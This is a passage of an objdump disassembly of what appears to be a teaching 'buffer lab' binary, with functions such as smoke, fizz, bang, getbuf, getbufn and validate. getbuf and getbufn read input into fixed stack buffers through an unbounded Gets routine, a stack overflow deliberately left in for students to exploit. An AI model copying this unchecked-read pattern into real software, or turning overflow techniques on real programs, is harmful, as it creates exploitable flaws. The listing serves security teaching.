80487f8: 50 push %eax
80487f9: 54 push %esp
80487fa: 52 push %edx
80487fb: 68 80 93 04 08 push $0x8049380
8048800: 68 90 93 04 08 push $0x8049390
8048805: 51 push %ecx
8048806: 56 push %esi
8048807: 68 40 90 04 08 push $0x8049040
804880c: e8 93 fe ff ff call 80486a4 <__libc_start_main@plt>
8048811: f4 hlt
8048812: 90 nop
8048813: 90 nop
08048814 <call_gmon_start>:
8048814: 55 push %ebp
8048815: 89 e5 mov %esp,%ebp
8048817: 53 push %ebx
8048818: 83 ec 04 sub $0x4,%esp
804881b: e8 00 00 00 00 call 8048820 <call_gmon_start+0xc>
8048820: 5b pop %ebx
8048821: 81 c3 c0 18 00 00 add $0x18c0,%ebx
8048827: 8b 93 fc ff ff ff mov 0xfffffffc(%ebx),%edx
804882d: 85 d2 test %edx,%edx
804882f: 74 05 je 8048836 <call_gmon_start+0x22>
8048831: e8 2e fe ff ff call 8048664 <__gmon_start__@plt>
8048836: 58 pop %eax
8048837: 5b pop %ebx
8048838: c9 leave
8048839: c3 ret
804883a: 90 nop
804883b: 90 nop
804883c: 90 nop
804883d: 90 nop
804883e: 90 nop
804883f: 90 nop
08048840 <__do_global_dtors_aux>:
8048840: 55 push %ebp
8048841: 89 e5 mov %esp,%ebp
8048843: 83 ec 08 sub $0x8,%esp
8048846: 80 3d 88 a1 04 08 00 cmpb $0x0,0x804a188
804884d: 74 0c je 804885b <__do_global_dtors_aux+0x1
804884f: eb 1c jmp 804886d <__do_global_dtors_aux+0x2
8048851: 83 c0 04 add $0x4,%eax
8048854: a3 60 a1 04 08 mov %eax,0x804a160
8048859: ff d2 call *%edx
804885b: a1 60 a1 04 08 mov 0x804a160,%eax
8048860: 8b 10 mov (%eax),%edx
8048862: 85 d2 test %edx,%edx
8048864: 75 eb jne 8048851 <__do_global_dtors_aux+0x1
8048866: c6 05 88 a1 04 08 01 movb $0x1,0x804a188
804886d: c9 leave
804886e: c3 ret
804886f: 90 nop
08048870 <frame_dummy>:
8048870: 55 push %ebp
8048871: 89 e5 mov %esp,%ebp
8048873: 83 ec 08 sub $0x8,%esp
8048876: a1 10 a0 04 08 mov 0x804a010,%eax
804887b: 85 c0 test %eax,%eax
804887d: 74 12 je 8048891 <frame_dummy+0x21>
804887f: b8 00 00 00 00 mov $0x0,%eax
8048884: 85 c0 test %eax,%eax
8048886: 74 09 je 8048891 <frame_dummy+0x21>
8048888: c7 04 24 10 a0 04 08 movl $0x804a010,(%esp)
804888f: ff d0 call *%eax
8048891: c9 leave
8048892: c3 ret
8048893: 90 nop
8048894: 90 nop
8048895: 90 nop
8048896: 90 nop
8048897: 90 nop
8048898: 90 nop
8048899: 90 nop
804889a: 90 nop
804889b: 90 nop
804889c: 90 nop
804889d: 90 nop
804889e: 90 nop
804889f: 90 nop
080488a0 <save_char>:
80488a0: 8b 0d c4 a1 04 08 mov 0x804a1c4,%ecx
80488a6: 55 push %ebp
80488a7: 89 e5 mov %esp,%ebp
80488a9: 53 push %ebx
80488aa: 89 c3 mov %eax,%ebx
80488ac: 81 f9 ff 03 00 00 cmp $0x3ff,%ecx
80488b2: 7f 37 jg 80488eb <save_char+0x4b>
80488b4: c0 f8 04 sar $0x4,%al
80488b7: 83 e0 0f and $0xf,%eax
80488ba: 0f b6 80 e4 99 04 08 movzbl 0x80499e4(%eax),%eax
80488c1: 8d 14 49 lea (%ecx,%ecx,2),%edx
80488c4: c6 82 e2 a1 04 08 20 movb $0x20,0x804a1e2(%edx)
80488cb: 88 82 e0 a1 04 08 mov %al,0x804a1e0(%edx)
80488d1: 89 d8 mov %ebx,%eax
80488d3: 83 e0 0f and $0xf,%eax
80488d6: 0f b6 80 e4 99 04 08 movzbl 0x80499e4(%eax),%eax
80488dd: 88 82 e1 a1 04 08 mov %al,0x804a1e1(%edx)
80488e3: 8d 41 01 lea 0x1(%ecx),%eax
80488e6: a3 c4 a1 04 08 mov %eax,0x804a1c4
80488eb: 5b pop %ebx
80488ec: 5d pop %ebp
80488ed: c3 ret
80488ee: 66 90 xchg %ax,%ax
080488f0 <entry_check>:
80488f0: 55 push %ebp
80488f1: 89 e5 mov %esp,%ebp
80488f3: 8b 45 08 mov 0x8(%ebp),%eax
80488f6: 5d pop %ebp
80488f7: a3 64 a1 04 08 mov %eax,0x804a164
80488fc: c3 ret
80488fd: 8d 76 00 lea 0x0(%esi),%esi
08048900 <illegalhandler>:
8048900: 55 push %ebp
8048901: 89 e5 mov %esp,%ebp
8048903: 83 ec 08 sub $0x8,%esp
8048906: c7 04 24 50 94 04 08 movl $0x8049450,(%esp)
804890d: e8 82 fe ff ff call 8048794 <puts@plt>
8048912: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
8048919: e8 76 fe ff ff call 8048794 <puts@plt>
804891e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048925: e8 aa fe ff ff call 80487d4 <exit@plt>
804892a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
08048930 <alarmhandler>:
8048930: 55 push %ebp
8048931: 89 e5 mov %esp,%ebp
8048933: 83 ec 08 sub $0x8,%esp
8048936: a1 68 a1 04 08 mov 0x804a168,%eax
804893b: c7 04 24 7c 94 04 08 movl $0x804947c,(%esp)
8048942: 89 44 24 04 mov %eax,0x4(%esp)
8048946: e8 d9 fd ff ff call 8048724 <printf@plt>
804894b: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
8048952: e8 3d fe ff ff call 8048794 <puts@plt>
8048957: c7 04 24 00 00 00 00 movl $0x0,(%esp)
804895e: e8 71 fe ff ff call 80487d4 <exit@plt>
8048963: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048969: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08048970 <seghandler>:
8048970: 55 push %ebp
8048971: 89 e5 mov %esp,%ebp
8048973: 83 ec 08 sub $0x8,%esp
8048976: c7 04 24 b0 94 04 08 movl $0x80494b0,(%esp)
804897d: e8 12 fe ff ff call 8048794 <puts@plt>
8048982: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
8048989: e8 06 fe ff ff call 8048794 <puts@plt>
804898e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048995: e8 3a fe ff ff call 80487d4 <exit@plt>
804899a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080489a0 <bushandler>:
80489a0: 55 push %ebp
80489a1: 89 e5 mov %esp,%ebp
80489a3: 83 ec 08 sub $0x8,%esp
80489a6: c7 04 24 d8 94 04 08 movl $0x80494d8,(%esp)
80489ad: e8 e2 fd ff ff call 8048794 <puts@plt>
80489b2: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
80489b9: e8 d6 fd ff ff call 8048794 <puts@plt>
80489be: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80489c5: e8 0a fe ff ff call 80487d4 <exit@plt>
80489ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080489d0 <usage>:
80489d0: 55 push %ebp
80489d1: 89 e5 mov %esp,%ebp
80489d3: 83 ec 08 sub $0x8,%esp
80489d6: 89 44 24 04 mov %eax,0x4(%esp)
80489da: c7 04 24 f8 94 04 08 movl $0x80494f8,(%esp)
80489e1: e8 3e fd ff ff call 8048724 <printf@plt>
80489e6: c7 04 24 da 97 04 08 movl $0x80497da,(%esp)
80489ed: e8 a2 fd ff ff call 8048794 <puts@plt>
80489f2: c7 04 24 f8 97 04 08 movl $0x80497f8,(%esp)
80489f9: e8 96 fd ff ff call 8048794 <puts@plt>
80489fe: c7 04 24 1c 95 04 08 movl $0x804951c,(%esp)
8048a05: e8 8a fd ff ff call 8048794 <puts@plt>
8048a0a: c7 04 24 44 95 04 08 movl $0x8049544,(%esp)
8048a11: e8 7e fd ff ff call 8048794 <puts@plt>
8048a16: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048a1d: e8 b2 fd ff ff call 80487d4 <exit@plt>
8048a22: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi
8048a29: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08048a30 <validate>:
8048a30: 55 push %ebp
8048a31: 89 e5 mov %esp,%ebp
8048a33: 81 ec 48 01 00 00 sub $0x148,%esp
8048a39: 8b 0d b4 a1 04 08 mov 0x804a1b4,%ecx
8048a3f: 89 5d f4 mov %ebx,0xfffffff4(%ebp)
8048a42: 8b 5d 08 mov 0x8(%ebp),%ebx
8048a45: 89 75 f8 mov %esi,0xfffffff8(%ebp)
8048a48: 89 7d fc mov %edi,0xfffffffc(%ebp)
8048a4b: 85 c9 test %ecx,%ecx
8048a4d: 0f 84 d8 01 00 00 je 8048c2b <validate+0x1fb>
8048a53: 83 fb 04 cmp $0x4,%ebx
8048a56: 77 58 ja 8048ab0 <validate+0x80>
8048a58: 3b 1d 64 a1 04 08 cmp 0x804a164,%ebx
8048a5e: 74 20 je 8048a80 <validate+0x50>
8048a60: c7 04 24 bc 95 04 08 movl $0x80495bc,(%esp)
8048a67: e8 28 fd ff ff call 8048794 <puts@plt>
8048a6c: 8d 74 26 00 lea 0x0(%esi),%esi
8048a70: 8b 5d f4 mov 0xfffffff4(%ebp),%ebx
8048a73: 8b 75 f8 mov 0xfffffff8(%ebp),%esi
8048a76: 8b 7d fc mov 0xfffffffc(%ebp),%edi
8048a79: 89 ec mov %ebp,%esp
8048a7b: 5d pop %ebp
8048a7c: c3 ret
8048a7d: 8d 76 00 lea 0x0(%esi),%esi
8048a80: 8b 04 9d 6c a1 04 08 mov 0x804a16c(,%ebx,4),%eax
8048a87: c7 05 bc a1 04 08 01 movl $0x1,0x804a1bc
8048a8e: 00 00 00
8048a91: 83 e8 01 sub $0x1,%eax
8048a94: 85 c0 test %eax,%eax
8048a96: 89 04 9d 6c a1 04 08 mov %eax,0x804a16c(,%ebx,4)
8048a9d: 7e 21 jle 8048ac0 <validate+0x90>
8048a9f: c7 04 24 0f 98 04 08 movl $0x804980f,(%esp)
8048aa6: e8 e9 fc ff ff call 8048794 <puts@plt>
8048aab: eb c3 jmp 8048a70 <validate+0x40>
8048aad: 8d 76 00 lea 0x0(%esi),%esi
8048ab0: c7 04 24 94 95 04 08 movl $0x8049594,(%esp)
8048ab7: e8 d8 fc ff ff call 8048794 <puts@plt>
8048abc: eb b2 jmp 8048a70 <validate+0x40>
8048abe: 66 90 xchg %ax,%ax
8048ac0: 8b 15 b8 a1 04 08 mov 0x804a1b8,%edx
8048ac6: 85 d2 test %edx,%edx
8048ac8: 0f 85 7f 01 00 00 jne 8048c4d <validate+0x21d>
8048ace: a1 a4 a1 04 08 mov 0x804a1a4,%eax
8048ad3: 85 c0 test %eax,%eax
8048ad5: 0f 84 61 01 00 00 je 8048c3c <validate+0x20c>
8048adb: c7 44 24 04 20 98 04 movl $0x8049820,0x4(%esp)
8048ae2: 08
8048ae3: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048aea: e8 c5 fc ff ff call 80487b4 <tempnam@plt>
8048aef: c7 44 24 04 27 98 04 movl $0x8049827,0x4(%esp)
8048af6: 08
8048af7: 89 85 e0 fe ff ff mov %eax,0xfffffee0(%ebp)
8048afd: 89 04 24 mov %eax,(%esp)
8048b00: e8 ef fb ff ff call 80486f4 <fopen@plt>
8048b05: 85 c0 test %eax,%eax
8048b07: 89 c6 mov %eax,%esi
8048b09: 0f 84 76 01 00 00 je 8048c85 <validate+0x255>
8048b0f: 89 44 24 0c mov %eax,0xc(%esp)
8048b13: c7 44 24 08 1b 00 00 movl $0x1b,0x8(%esp)
8048b1a: 00
8048b1b: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048b22: 00
8048b23: c7 04 24 29 98 04 08 movl $0x8049829,(%esp)
8048b2a: e8 15 fc ff ff call 8048744 <fwrite@plt>
8048b2f: 89 74 24 04 mov %esi,0x4(%esp)
8048b33: c7 04 24 0a 00 00 00 movl $0xa,(%esp)
8048b3a: e8 45 fc ff ff call 8048784 <fputc@plt>
8048b3f: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048b46: e8 29 fc ff ff call 8048774 <cuserid@plt>
8048b4b: 85 c0 test %eax,%eax
8048b4d: 0f 84 19 01 00 00 je 8048c6c <validate+0x23c>
8048b53: 8d 7d eb lea 0xffffffeb(%ebp),%edi
8048b56: 89 44 24 04 mov %eax,0x4(%esp)
8048b5a: 89 3c 24 mov %edi,(%esp)
8048b5d: e8 b2 fb ff ff call 8048714 <strcpy@plt>
8048b62: 89 7c 24 08 mov %edi,0x8(%esp)
8048b66: c7 44 24 04 45 98 04 movl $0x8049845,0x4(%esp)
8048b6d: 08
8048b6e: 89 34 24 mov %esi,(%esp)
8048b71: e8 de fb ff ff call 8048754 <fprintf@plt>
8048b76: a1 b0 a1 04 08 mov 0x804a1b0,%eax
8048b7b: 89 5c 24 10 mov %ebx,0x10(%esp)
8048b7f: 8d 9d eb fe ff ff lea 0xfffffeeb(%ebp),%ebx
8048b85: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp)
8048b8c: 00
8048b8d: c7 44 24 18 e0 a1 04 movl $0x804a1e0,0x18(%esp)
8048b94: 08
8048b95: 89 44 24 14 mov %eax,0x14(%esp)
8048b99: a1 b4 a1 04 08 mov 0x804a1b4,%eax
8048b9e: c7 44 24 08 6f 3b 00 movl $0x3b6f,0x8(%esp)
8048ba5: 00
8048ba6: c7 44 24 04 2c 96 04 movl $0x804962c,0x4(%esp)
8048bad: 08
8048bae: 89 34 24 mov %esi,(%esp)
8048bb1: 89 44 24 0c mov %eax,0xc(%esp)
8048bb5: e8 9a fb ff ff call 8048754 <fprintf@plt>
8048bba: 89 34 24 mov %esi,(%esp)
8048bbd: e8 12 fb ff ff call 80486d4 <fclose@plt>
8048bc2: 8b 85 e0 fe ff ff mov 0xfffffee0(%ebp),%eax
8048bc8: c7 44 24 14 53 98 04 movl $0x8049853,0x14(%esp)
8048bcf: 08
8048bd0: c7 44 24 10 5d 98 04 movl $0x804985d,0x10(%esp)
8048bd7: 08
8048bd8: c7 44 24 0c 63 98 04 movl $0x8049863,0xc(%esp)
8048bdf: 08
8048be0: 89 44 24 08 mov %eax,0x8(%esp)
8048be4: c7 44 24 04 7a 98 04 movl $0x804987a,0x4(%esp)
8048beb: 08
8048bec: 89 1c 24 mov %ebx,(%esp)
8048bef: e8 30 fa ff ff call 8048624 <sprintf@plt>
8048bf4: 89 1c 24 mov %ebx,(%esp)
8048bf7: e8 88 fa ff ff call 8048684 <system@plt>
8048bfc: 85 c0 test %eax,%eax
8048bfe: 75 5e jne 8048c5e <validate+0x22e>
8048c00: c7 04 24 8d 98 04 08 movl $0x804988d,(%esp)
8048c07: e8 88 fb ff ff call 8048794 <puts@plt>
8048c0c: c7 04 24 4c 96 04 08 movl $0x804964c,(%esp)
8048c13: e8 7c fb ff ff call 8048794 <puts@plt>
8048c18: 8b 85 e0 fe ff ff mov 0xfffffee0(%ebp),%eax
8048c1e: 89 04 24 mov %eax,(%esp)
8048c21: e8 3e fb ff ff call 8048764 <remove@plt>
8048c26: e9 45 fe ff ff jmp 8048a70 <validate+0x40>
8048c2b: c7 04 24 68 95 04 08 movl $0x8049568,(%esp)
8048c32: e8 5d fb ff ff call 8048794 <puts@plt>
8048c37: e9 34 fe ff ff jmp 8048a70 <validate+0x40>
8048c3c: c7 04 24 bc 96 04 08 movl $0x80496bc,(%esp)
8048c43: e8 4c fb ff ff call 8048794 <puts@plt>
8048c48: e9 23 fe ff ff jmp 8048a70 <validate+0x40>
8048c4d: c7 04 24 1a 98 04 08 movl $0x804981a,(%esp)
8048c54: e8 3b fb ff ff call 8048794 <puts@plt>
8048c59: e9 12 fe ff ff jmp 8048a70 <validate+0x40>
8048c5e: c7 04 24 7c 96 04 08 movl $0x804967c,(%esp)
8048c65: e8 2a fb ff ff call 8048794 <puts@plt>
8048c6a: eb ac jmp 8048c18 <validate+0x1e8>
8048c6c: 8d 7d eb lea 0xffffffeb(%ebp),%edi
8048c6f: c7 45 eb 6e 6f 62 6f movl $0x6f626f6e,0xffffffeb(%eb
8048c76: 66 c7 45 ef 64 79 movw $0x7964,0xffffffef(%ebp)
8048c7c: c6 45 f1 00 movb $0x0,0xfffffff1(%ebp)
8048c80: e9 dd fe ff ff jmp 8048b62 <validate+0x132>
8048c85: c7 04 24 f8 95 04 08 movl $0x80495f8,(%esp)
8048c8c: e8 93 fa ff ff call 8048724 <printf@plt>
8048c91: c7 04 24 01 00 00 00 movl $0x1,(%esp)
8048c98: e8 37 fb ff ff call 80487d4 <exit@plt>
8048c9d: 8d 76 00 lea 0x0(%esi),%esi
08048ca0 <bang>:
8048ca0: 55 push %ebp
8048ca1: 89 e5 mov %esp,%ebp
8048ca3: 83 ec 08 sub $0x8,%esp
8048ca6: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8048cad: e8 3e fc ff ff call 80488f0 <entry_check>
8048cb2: a1 c0 a1 04 08 mov 0x804a1c0,%eax
8048cb7: 3b 05 b0 a1 04 08 cmp 0x804a1b0,%eax
8048cbd: 74 21 je 8048ce0 <bang+0x40>
8048cbf: 89 44 24 04 mov %eax,0x4(%esp)
8048cc3: c7 04 24 97 98 04 08 movl $0x8049897,(%esp)
8048cca: e8 55 fa ff ff call 8048724 <printf@plt>
8048ccf: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048cd6: e8 f9 fa ff ff call 80487d4 <exit@plt>
8048cdb: 90 nop
8048cdc: 8d 74 26 00 lea 0x0(%esi),%esi
8048ce0: 89 44 24 04 mov %eax,0x4(%esp)
8048ce4: c7 04 24 08 97 04 08 movl $0x8049708,(%esp)
8048ceb: e8 34 fa ff ff call 8048724 <printf@plt>
8048cf0: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8048cf7: e8 34 fd ff ff call 8048a30 <validate>
8048cfc: eb d1 jmp 8048ccf <bang+0x2f>
8048cfe: 66 90 xchg %ax,%ax
08048d00 <fizz>:
8048d00: 55 push %ebp
8048d01: 89 e5 mov %esp,%ebp
8048d03: 53 push %ebx
8048d04: 83 ec 14 sub $0x14,%esp
8048d07: 8b 5d 08 mov 0x8(%ebp),%ebx
8048d0a: c7 04 24 01 00 00 00 movl $0x1,(%esp)
8048d11: e8 da fb ff ff call 80488f0 <entry_check>
8048d16: 3b 1d b0 a1 04 08 cmp 0x804a1b0,%ebx
8048d1c: 74 22 je 8048d40 <fizz+0x40>
8048d1e: 89 5c 24 04 mov %ebx,0x4(%esp)
8048d22: c7 04 24 30 97 04 08 movl $0x8049730,(%esp)
8048d29: e8 f6 f9 ff ff call 8048724 <printf@plt>
8048d2e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d35: e8 9a fa ff ff call 80487d4 <exit@plt>
8048d3a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048d40: 89 5c 24 04 mov %ebx,0x4(%esp)
8048d44: c7 04 24 b5 98 04 08 movl $0x80498b5,(%esp)
8048d4b: e8 d4 f9 ff ff call 8048724 <printf@plt>
8048d50: c7 04 24 01 00 00 00 movl $0x1,(%esp)
8048d57: e8 d4 fc ff ff call 8048a30 <validate>
8048d5c: eb d0 jmp 8048d2e <fizz+0x2e>
8048d5e: 66 90 xchg %ax,%ax
08048d60 <smoke>:
8048d60: 55 push %ebp
8048d61: 89 e5 mov %esp,%ebp
8048d63: 83 ec 08 sub $0x8,%esp
8048d66: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d6d: e8 7e fb ff ff call 80488f0 <entry_check>
8048d72: c7 04 24 d3 98 04 08 movl $0x80498d3,(%esp)
8048d79: e8 16 fa ff ff call 8048794 <puts@plt>
8048d7e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d85: e8 a6 fc ff ff call 8048a30 <validate>
8048d8a: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d91: e8 3e fa ff ff call 80487d4 <exit@plt>
8048d96: 8d 76 00 lea 0x0(%esi),%esi
8048d99: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08048da0 <Gets>:
8048da0: 55 push %ebp
8048da1: 89 e5 mov %esp,%ebp
8048da3: 57 push %edi
8048da4: 56 push %esi
8048da5: 53 push %ebx
8048da6: 83 ec 0c sub $0xc,%esp
8048da9: 8b 1d ac a1 04 08 mov 0x804a1ac,%ebx
8048daf: c7 05 c4 a1 04 08 00 movl $0x0,0x804a1c4
8048db6: 00 00 00
8048db9: 8b 75 08 mov 0x8(%ebp),%esi
8048dbc: 85 db test %ebx,%ebx
8048dbe: 74 72 je 8048e32 <Gets+0x92>
8048dc0: bf 01 00 00 00 mov $0x1,%edi
8048dc5: c7 45 f0 00 00 00 00 movl $0x0,0xfffffff0(%ebp)
8048dcc: 8d 74 26 00 lea 0x0(%esi),%esi
8048dd0: a1 a0 a1 04 08 mov 0x804a1a0,%eax
8048dd5: 89 04 24 mov %eax,(%esp)
8048dd8: e8 d7 f8 ff ff call 80486b4 <_IO_getc@plt>
8048ddd: 83 f8 ff cmp $0xffffffff,%eax
8048de0: 89 c3 mov %eax,%ebx
8048de2: 74 60 je 8048e44 <Gets+0xa4>
8048de4: 83 f8 0a cmp $0xa,%eax
8048de7: 74 5b je 8048e44 <Gets+0xa4>
8048de9: e8 d6 f8 ff ff call 80486c4 <__ctype_b_loc@plt>
8048dee: 8b 00 mov (%eax),%eax
8048df0: f6 44 58 01 10 testb $0x10,0x1(%eax,%ebx,2)
8048df5: 74 d9 je 8048dd0 <Gets+0x30>
8048df7: 8d 43 d0 lea 0xffffffd0(%ebx),%eax
8048dfa: 83 f8 09 cmp $0x9,%eax
8048dfd: 89 c2 mov %eax,%edx
8048dff: 76 0f jbe 8048e10 <Gets+0x70>
8048e01: 8d 43 bf lea 0xffffffbf(%ebx),%eax
8048e04: 83 f8 05 cmp $0x5,%eax
8048e07: 8d 53 c9 lea 0xffffffc9(%ebx),%edx
8048e0a: 76 04 jbe 8048e10 <Gets+0x70>
8048e0c: 8d 53 a9 lea 0xffffffa9(%ebx),%edx
8048e0f: 90 nop
8048e10: 85 ff test %edi,%edi
8048e12: 74 4c je 8048e60 <Gets+0xc0>
8048e14: 31 ff xor %edi,%edi
8048e16: 89 55 f0 mov %edx,0xfffffff0(%ebp)
8048e19: eb b5 jmp 8048dd0 <Gets+0x30>
8048e1b: 90 nop
8048e1c: 8d 74 26 00 lea 0x0(%esi),%esi
8048e20: 83 f8 0a cmp $0xa,%eax
8048e23: 74 1f je 8048e44 <Gets+0xa4>
8048e25: 88 06 mov %al,(%esi)
8048e27: 0f be c0 movsbl %al,%eax
8048e2a: 83 c6 01 add $0x1,%esi
8048e2d: e8 6e fa ff ff call 80488a0 <save_char>
8048e32: a1 a0 a1 04 08 mov 0x804a1a0,%eax
8048e37: 89 04 24 mov %eax,(%esp)
8048e3a: e8 75 f8 ff ff call 80486b4 <_IO_getc@plt>
8048e3f: 83 f8 ff cmp $0xffffffff,%eax
8048e42: 75 dc jne 8048e20 <Gets+0x80>
8048e44: c6 06 00 movb $0x0,(%esi)
8048e47: a1 c4 a1 04 08 mov 0x804a1c4,%eax
8048e4c: c6 84 40 e0 a1 04 08 movb $0x0,0x804a1e0(%eax,%eax,2
8048e53: 00
8048e54: 8b 45 08 mov 0x8(%ebp),%eax
8048e57: 83 c4 0c add $0xc,%esp
8048e5a: 5b pop %ebx
8048e5b: 5e pop %esi
8048e5c: 5f pop %edi
8048e5d: 5d pop %ebp
8048e5e: c3 ret
8048e5f: 90 nop
8048e60: 8b 45 f0 mov 0xfffffff0(%ebp),%eax
8048e63: bf 01 00 00 00 mov $0x1,%edi
8048e68: c1 e0 04 shl $0x4,%eax
8048e6b: 8d 04 02 lea (%edx,%eax,1),%eax
8048e6e: 88 06 mov %al,(%esi)
8048e70: 0f be c0 movsbl %al,%eax
8048e73: 83 c6 01 add $0x1,%esi
8048e76: e8 25 fa ff ff call 80488a0 <save_char>
8048e7b: e9 50 ff ff ff jmp 8048dd0 <Gets+0x30>
08048e80 <getbufn>:
8048e80: 55 push %ebp
8048e81: 89 e5 mov %esp,%ebp
8048e83: 81 ec 08 02 00 00 sub $0x208,%esp
8048e89: 8d 85 00 fe ff ff lea 0xfffffe00(%ebp),%eax
8048e8f: 89 04 24 mov %eax,(%esp)
8048e92: e8 09 ff ff ff call 8048da0 <Gets>
8048e97: b8 01 00 00 00 mov $0x1,%eax
8048e9c: c9 leave
8048e9d: c3 ret
8048e9e: 66 90 xchg %ax,%ax
08048ea0 <testn>:
8048ea0: 55 push %ebp
8048ea1: 89 e5 mov %esp,%ebp
8048ea3: 83 ec 18 sub $0x18,%esp
8048ea6: c7 45 fc ef be ad de movl $0xdeadbeef,0xfffffffc(%eb
8048ead: c7 04 24 04 00 00 00 movl $0x4,(%esp)
8048eb4: e8 37 fa ff ff call 80488f0 <entry_check>
8048eb9: e8 c2 ff ff ff call 8048e80 <getbufn>
8048ebe: 89 c2 mov %eax,%edx
8048ec0: 8b 45 fc mov 0xfffffffc(%ebp),%eax
8048ec3: 3d ef be ad de cmp $0xdeadbeef,%eax
8048ec8: 74 0e je 8048ed8 <testn+0x38>
8048eca: c7 04 24 50 97 04 08 movl $0x8049750,(%esp)
8048ed1: e8 be f8 ff ff call 8048794 <puts@plt>
8048ed6: c9 leave
8048ed7: c3 ret
8048ed8: 3b 15 b0 a1 04 08 cmp 0x804a1b0,%edx
8048ede: 74 12 je 8048ef2 <testn+0x52>
8048ee0: 89 54 24 04 mov %edx,0x4(%esp)
8048ee4: c7 04 24 ee 98 04 08 movl $0x80498ee,(%esp)
8048eeb: e8 34 f8 ff ff call 8048724 <printf@plt>
8048ef0: c9 leave
8048ef1: c3 ret
8048ef2: 89 54 24 04 mov %edx,0x4(%esp)
8048ef6: c7 04 24 7c 97 04 08 movl $0x804977c,(%esp)
8048efd: e8 22 f8 ff ff call 8048724 <printf@plt>
8048f02: c7 04 24 04 00 00 00 movl $0x4,(%esp)
8048f09: e8 22 fb ff ff call 8048a30 <validate>
8048f0e: c9 leave
8048f0f: c3 ret
08048f10 <getbuf>:
8048f10: 55 push %ebp
8048f11: 89 e5 mov %esp,%ebp
8048f13: 83 ec 18 sub $0x18,%esp
8048f16: 8d 45 f0 lea 0xfffffff0(%ebp),%eax
8048f19: 89 04 24 mov %eax,(%esp)
8048f1c: e8 7f fe ff ff call 8048da0 <Gets>
8048f21: b8 01 00 00 00 mov $0x1,%eax
8048f26: c9 leave
8048f27: c3 ret
8048f28: 90 nop
8048f29: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi
08048f30 <test>:
8048f30: 55 push %ebp
8048f31: 89 e5 mov %esp,%ebp
8048f33: 83 ec 18 sub $0x18,%esp
8048f36: c7 45 fc ef be ad de movl $0xdeadbeef,0xfffffffc(%eb
8048f3d: c7 04 24 03 00 00 00 movl $0x3,(%esp)
8048f44: e8 a7 f9 ff ff call 80488f0 <entry_check>
8048f49: e8 c2 ff ff ff call 8048f10 <getbuf>
8048f4e: 89 c2 mov %eax,%edx
8048f50: 8b 45 fc mov 0xfffffffc(%ebp),%eax
8048f53: 3d ef be ad de cmp $0xdeadbeef,%eax
8048f58: 74 0e je 8048f68 <test+0x38>
8048f5a: c7 04 24 50 97 04 08 movl $0x8049750,(%esp)
8048f61: e8 2e f8 ff ff call 8048794 <puts@plt>
8048f66: c9 leave
8048f67: c3 ret
8048f68: 3b 15 b0 a1 04 08 cmp 0x804a1b0,%edx
8048f6e: 74 12 je 8048f82 <test+0x52>
8048f70: 89 54 24 04 mov %edx,0x4(%esp)
8048f74: c7 04 24 27 99 04 08 movl $0x8049927,(%esp)
8048f7b: e8 a4 f7 ff ff call 8048724 <printf@plt>
8048f80: c9 leave
8048f81: c3 ret
8048f82: 89 54 24 04 mov %edx,0x4(%esp)
8048f86: c7 04 24 0a 99 04 08 movl $0x804990a,(%esp)
8048f8d: e8 92 f7 ff ff call 8048724 <printf@plt>
8048f92: c7 04 24 03 00 00 00 movl $0x3,(%esp)
8048f99: e8 92 fa ff ff call 8048a30 <validate>
8048f9e: c9 leave
8048f9f: c3 ret
08048fa0 <launch>:
8048fa0: 55 push %ebp
8048fa1: 89 e5 mov %esp,%ebp
8048fa3: 53 push %ebx
8048fa4: 89 c3 mov %eax,%ebx
8048fa6: 8d 45 bc lea 0xffffffbc(%ebp),%eax
8048fa9: 83 ec 54 sub $0x54,%esp
8048fac: 25 f8 3f 00 00 and $0x3ff8,%eax
8048fb1: 01 c2 add %eax,%edx
8048fb3: 8d 42 1e lea 0x1e(%edx),%eax
8048fb6: 83 e0 f0 and $0xfffffff0,%eax
8048fb9: 29 c4 sub %eax,%esp
8048fbb: 8d 44 24 1b lea 0x1b(%esp),%eax
8048fbf: 83 e0 f0 and $0xfffffff0,%eax
8048fc2: 89 54 24 08 mov %edx,0x8(%esp)
8048fc6: c7 44 24 04 f4 00 00 movl $0xf4,0x4(%esp)
8048fcd: 00
8048fce: 89 04 24 mov %eax,(%esp)
8048fd1: e8 be f6 ff ff call 8048694 <memset@plt>
8048fd6: a1 a8 a1 04 08 mov 0x804a1a8,%eax
8048fdb: 85 c0 test %eax,%eax
8048fdd: 75 15 jne 8048ff4 <launch+0x54>
8048fdf: a1 ac a1 04 08 mov 0x804a1ac,%eax
8048fe4: 85 c0 test %eax,%eax
8048fe6: 75 40 jne 8049028 <launch+0x88>
8048fe8: c7 04 24 53 99 04 08 movl $0x8049953,(%esp)
8048fef: e8 30 f7 ff ff call 8048724 <printf@plt>
8048ff4: 85 db test %ebx,%ebx
8048ff6: 74 29 je 8049021 <launch+0x81>
8048ff8: e8 a3 fe ff ff call 8048ea0 <testn>
8048ffd: a1 bc a1 04 08 mov 0x804a1bc,%eax
8049002: 85 c0 test %eax,%eax
8049004: 75 16 jne 804901c <launch+0x7c>
